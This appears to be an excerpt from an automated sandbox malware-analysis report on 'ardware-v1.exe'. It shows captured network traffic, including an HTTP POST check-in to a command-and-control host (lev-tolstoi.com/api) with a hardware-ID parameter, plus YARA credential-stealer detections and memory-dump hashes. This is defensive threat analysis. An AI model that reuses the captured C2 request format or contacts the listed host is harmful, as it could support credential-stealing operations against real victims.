Data Raw: d8 de a9 8c f8 83 ff a1 e1 b3 f9 80 e0 93 cf 07 de ef 41 23 ee 09 48 99 04 05 b2 f8 69 6e 90 76 21 86 fa 0a 82 2b e5 d4 40 77 c2 19 50 90 da ab 09 05 1d 52 2c 10 05 7f e4 fa e4 4e fa b8 0f 3b ef 07 8d 9b db fd d3 7a f1 29 67 78 e6 df d9 cd 2c c0 56 17 e9 ef f1 5c d8 e9 ab cb 36 99 ce 3c a8 de 6c f5 9a 74 51 d9 28 10 4e 88 94 4d 8d bc c7 b5 a3 e3 e8 27 e7 7d 93 12 7c 79 86 bc 2b fe 6f 89 88 c7 4f 3f 5b fc 54 80 fc 24 b2 95 ff 18 f1 18 38 86 a8 44 a7 bf 19 a1 bc 3f 68 07 77 ca 30 64 67 77 a0 ae 9d 8e 47 91 78 34 50 17 44 6a c7 ac fd d0 e7 66 00 d1 45 1e a1 9c 6b 3a 6a 84 ae 18 b8 94 fc fa c9 53 56 d6 6e 85 49 3e cc 16 7a de ba 31 4b 3d 89 9c 34 26 c6 d5 99 80 5f c2 2f e2 d7 a7 e5 aa e2 3c 62 6f ad 57 85 ee c4 bc e6 6d 6b b8 ff 65 9a 04 1b a9 72 88 f8 4b 9e
Data Ascii: A#Hinv!+@wPR,N;z)gx,V\6<ltQ(NM'}|y+oO?[T$8D?hw0dgwGx4PDjfEk:jSVnI>z1K=4&_/<boWmkerK
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: aa b5 d1 89 30 9d 3e b4 a2 c6 00 b4 8c 3b 34 01 d0 ec 24 37 b6 2e 7f f7 5e 77 68 d2 f2 78 5c 7e 8e 5d ca 95 cf c5 cb 82 21 ad 93 a3 e1 27 17 1e bf db 8d 28 6b a9 bf 34 fa f9 56 ab e0 4b d4 e5 82 9b 0b ab 8b 64 22 72 e1 7f 8f 5a 96 21 17 9d fb b6 18 cd 72 47 c6 be 13 3e 5f fe 9c cd d3 7a 33 9a 93 f0 9d bd 31 9a 48 5b 51 64 ec 60 29 78 10 87 c7 26 67 29 c1 1f 54 18 ec 5f dc 38 74 5a 14 9c aa 26 66 9e b9 67 c2 f3 94 63 fd d0 94 17 9c 4c 3d 98 97 c3 b7 d0 b6 e8 e6 48 7d b3 55 12 3d bf fa 8a c0 9b 2c 7e e3 db 75 98 19 ad ee b1 e7 d5 c8 fb 2a 5b 44 f6 61 3b 0d ee 2f eb 30 aa 2a f8 a0 d3 a5 87 44 e2 62 d5 aa b9 26 ec 98 36 95 a3 df 5f be f5 b9 75 e1 40 50 c6 ab eb 12 f1 67 66 19 ce 9f 09 14 55 c0 74 97 27 ab dc 5f e5 ab e2 c6 d0 32 d0 d4 5e 7e 10 92 fe 6a ca 6d
Data Ascii: 0>;4$7.^whx\~]!'(k4VKd"rZ!rG>_z31H[Qd`)x&g)T_8tZ&fgcL=H}U=,~u*[Da;/0*Db&6_u@PgfUt'_2^~jm
2024-12-18 08:59:05 UTC | 15331 bytes | OUT
Data Raw: e0 a0 32 aa 1d c5 7e 9c 8d f7 bb 66 5e 7f 71 db ff e4 85 e0 f3 57 da ec d5 b4 16 df 57 cd 42 97 ec ce 62 8d d2 0d 0a cf 95 0a 3f 98 2a 5b 35 78 ab 69 6b 2b ce 92 d5 dc c7 54 4a 77 bd 76 4a bb 4d ca e1 bc 14 9f 29 29 30 68 b9 2d 31 c6 e1 c3 9e 68 ba cf f2 ae f0 a0 77 0b 5b 10 f6 2a 3b 46 8b 66 2c 7a bf b6 68 e9 55 ba f9 b1 a1 41 74 eb b4 1c e2 5c 24 75 95 77 60 45 8a 32 8e a3 a5 1a 17 6d 16 e7 6e 14 7c 0b 48 a1 e8 73 ee bf 68 f6 c8 97 7b fe 3e 65 eb 36 3b 67 f4 43 b9 28 d7 eb 76 b9 4d 9d b4 f5 59 1b b3 f7 f4 9b a5 f3 b7 9b df bd 7a 1b 3a fd 28 a7 7d 25 44 70 91 d9 96 b5 df 32 57 4a a1 e2 8a 10 b9 dc 46 9c fb 06 71 64 fe d5 cb 29 b7 4f d6 b3 2b 12 e5 2b c9 9d fe 16 2a 17 2c 82 ab de 85 5d f7 f8 55 51 d8 e3 c1 f4 50 3f f6 ab 72 aa a3 62 29 44 34 e7 fd 4c d8
Data Ascii: 2~f^qWWBb?*[5xik+TJwvJM))0h-1hw[*;Ff,zhUAt\$uw`E2mn|Hsh{>e6;gC(vMYz:(}%Dp2WJFqd)O++*,]UQP?rb)D4L
2024-12-18 08:59:07 UTC | 1042 bytes | IN
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:59:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gvtvgnt5spc8f5glc5hi4tupp4; expires=Sun, 13-Apr-2025 02:45:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3MqH5ylLVBSfS44m7BuC7PtIAS4exl5rLtyX5qTOmkfigXH1XYMZvkJBCey60Y0XI9sIVp4mb%2Fl51Gc39KR6PxjNxg5cpZEavaIEllx%2FN5%2BKAJMiZekXu784GOodOrTsbM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f3df46fbbbfc47a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1464&rtt_var=560&sent=387&recv=615&lost=0&retrans=0&sent_bytes=2836&recv_bytes=593574&delivery_rate=1933774&cwnd=244&unsent_bytes=0&cid=be3aa5397147ec64&ts=2591&x=0"


Session ID: 10
Source IP: 192.168.2.8
Source Port: 49722
Destination IP: 104.21.66.86
Destination Port: 443
PID: 7748
Process: C:\Users\user\Desktop\ardware-v1.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 08:59:09 UTC | 263 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 77
Host: lev-tolstoi.com
2024-12-18 08:59:09 UTC | 77 bytes | OUT
Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d 26 68 77 69 64 3d 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
Data Ascii: act=get_message&ver=4.0&lid=tfL8re--&j=&hwid=AF28D57A4597695CAC8923850305D13E
2024-12-18 08:59:09 UTC | 1040 bytes | IN
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:59:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5klki0fkruc59v1fqnn3m9btgb; expires=Sun, 13-Apr-2025 02:45:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9T6fSvvX9BuX3Q3Ltl%2FJrzU4VGjEBKcesV5%2F7b3HJx%2BS1b0iXWodeCR%2BjY8vOfIftqbAlvRTj9fGj7YAVaC4WsFMOEtvCkEz69hW46EVNH%2B0ddc68YyKEisU%2BdJoku0wAY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4879bc1431f-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2061&rtt_var=788&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=976&delivery_rate=1376060&cwnd=249&unsent_bytes=0&cid=1eec9e94f43badaf&ts=823&x=0"
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC54INData Raw: 33 30 0d 0a 46 54 4c 54 45 2b 50 2b 51 7a 76 6a 79 54 4b 74 57 54 64 75 33 42 62 44 50 66 58 66 65 58 50 37 6d 78 4c 36 6e 79 6d 43 32 6f 64 4f 62 77 3d 3d 0d 0a
                                                                                                                                                                                                              Data Ascii: 30FTLTE+P+QzvjyTKtWTdu3BbDPfXfeXP7mxL6nymC2odObw==
                                                                                                                                                                                                              2024-12-18 08:59:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0

Target ID: 0
Start time: 03:57:10
Start date: 18/12/2024
Path: C:\Users\user\Desktop\ardware-v1.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ardware-v1.exe"
Imagebase: 0x7d0000
File size: 3'487'960 bytes
MD5 hash: C491DDBA2EE7516CFC5D5B57ECE509A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2521182506.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2486324399.0000000001085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2521127608.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2422257557.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2520772044.00000000010C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2520811378.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.2543143805.0000000001055000.00000004.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1055000_ardware-v1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: de84e4d1fc8ac449cd82f6cc81143c8a076d4ffe960f59413dfaaed23cbe4120
• Instruction ID: b837f39e525f0c94e58df1b3af54e20ebb3927e4020153a9e7e08045ebce193d
• Opcode Fuzzy Hash: de84e4d1fc8ac449cd82f6cc81143c8a076d4ffe960f59413dfaaed23cbe4120
• Instruction Fuzzy Hash: 0B22DA6244E3C11FD7578B704C6A991BFB46E2321470EC6CFC8C58E8A3E359994AD762
Memory Dump Source
• Source File: 00000000.00000003.2543143805.0000000001085000.00000004.00000020.00020000.00000000.sdmp, Offset: 01085000, based on PE: false
• Associated: 00000000.00000003.2517966266.0000000001085000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1085000_ardware-v1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a227e7792d4cb8bab443ef47d82994a1c42183bbaee07e224e0d048f8546fae
• Instruction ID: 7e7d785fd1ddf580f57675796d68ec663a69e3089e74d81bda56672d04cf3ac2
• Opcode Fuzzy Hash: 3a227e7792d4cb8bab443ef47d82994a1c42183bbaee07e224e0d048f8546fae
• Instruction Fuzzy Hash: 6631EE6050E3D0AFC3439B7888694453F71AE1721831F44EBC8D5DF1B7C62A585ED766